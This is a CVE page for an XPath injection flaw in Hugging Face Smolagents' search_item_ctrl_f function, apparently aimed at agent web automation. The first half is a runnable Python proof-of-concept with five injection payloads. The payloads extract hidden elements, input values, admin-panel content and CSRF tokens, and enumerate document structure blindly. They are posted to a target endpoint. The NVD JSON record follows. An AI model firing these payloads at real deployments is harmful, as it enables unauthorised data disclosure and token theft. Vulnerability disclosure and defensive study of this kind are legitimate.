CVE-2025-11844

# CVE-2025-11844 - XPath Injection PoC for Hugging Face Smolagents # Vulnerable function: search_item_ctrl_f in src/smolagents/vision_web_browser.py # The function constructs XPath by directly concatenating user input without sanitization import requests import json # Target Smolagents API endpoint (vision web browser search functionality) TARGET_URL = "http://target-smolagents-instance:7860/api/search" # Malicious XPath injection payloads payloads = [ # Payload 1: Bypass search filter to access hidden elements { "query": "test'] | //*[@class='secret-data'] | //*[contains(text(),'test", "description": "Bypass search filter to access elements with class 'secret-data'" }, # Payload 2: Extract all input values from the page { "query": "anything'] | //input/@value | //*[contains(text(),'anything", "description": "Extract all input field values via XPath injection" }, # Payload 3: Access admin panel elements { "query": "search'] | //*[@id='admin-panel']//* | //*[contains(text(),'search", "description": "Access admin panel DOM elements" }, # Payload 4: Boolean-based blind XPath injection { "query": "test' and substring(name(/*),1,1)='h' and '1'='1", "description": "Blind XPath injection to enumerate document structure" }, # Payload 5: Union-based XPath injection to extract sensitive data { "query": "x'] | //meta[@name='csrf-token']/@content | //*[contains(text(),'x", "description": "Extract CSRF tokens and other meta tag content" } ] def exploit_xpath_injection(url, payload): """ Send malicious XPath injection payload to the vulnerable search_item_ctrl_f function in Smolagents vision web browser. """ headers = { "Content-Type": "application/json", "User-Agent": "Smolagents-Client/1.20.0" } data = { "action": "search_item_ctrl_f", "query": payload["query"], "page_url": "http://target-website.com/page" } try: response = requests.post(url, headers=headers, json=data, timeout=10) if response.status_code == 200: result = response.json() print(f"[+] Payload: {payload['description']}") print(f"[+] Query: {payload['query']}") print(f"[+] Response: {json.dumps(result, indent=2)}") return result else: print(f"[-] Request failed with status code: {response.status_code}") return None except Exception as e: print(f"[-] Error: {e}") return None # Example of the vulnerable XPath construction: # Original (vulnerable) code pattern: # xpath_query = f"//*[contains(text(), '{user_input}')]" # # With injected payload: test'] | //*[@class='secret-data'] | //*[contains(text(),'test # Resulting XPath: //*[contains(text(), 'test'] | //*[@class='secret-data'] | //*[contains(text(),'test')] # This bypasses the intended search and returns elements with class 'secret-data' if __name__ == "__main__": print("=" * 60) print("CVE-2025-11844 - XPath Injection PoC") print("Target: Hugging Face Smolagents < 1.22.0") print("=" * 60) for payload in payloads: exploit_xpath_injection(TARGET_URL, payload) print("-" * 60)

{"cve": {"id": "CVE-2025-11844", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:49.457", "lastModified": "2025-10-30T17:43:35.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Smolagents version 1.20.0 contains an XPath injection vulnerability in the search_item_ctrl_f function located in src/smolagents/vision_web_browser.py. The function constructs an XPath query by directly concatenating user-supplied input into the XPath expression without proper sanitization or escaping. This allows an attacker to inject malicious XPath syntax that can alter the intended query logic. The vulnerability enables attackers to bypass search filters, access unintended DOM elements, and disrupt web automation workflows. This can lead to information disclosure, manipulation of AI agent interactions, and compromise the reliability of automated web tasks. The issue is fixed in version 1.22.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-643"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:smolagents:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.20.0", "versionEndExcluding": "1.22.0", "matchCriteriaId": "4FBDA817-4B1A-4C1C-B28E-039793EE915C"}]}]}], "references": [{"url": "https://github.com/huggingface/smolagents/commit/f570ed5e17999d4cf7d5e79c2830fbaefab8a794", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/01ab4405-9bca-4b26-b7a3-5ca1863a69b4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/01ab4405-9bca-4b26-b7a3-5ca1863a69b4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}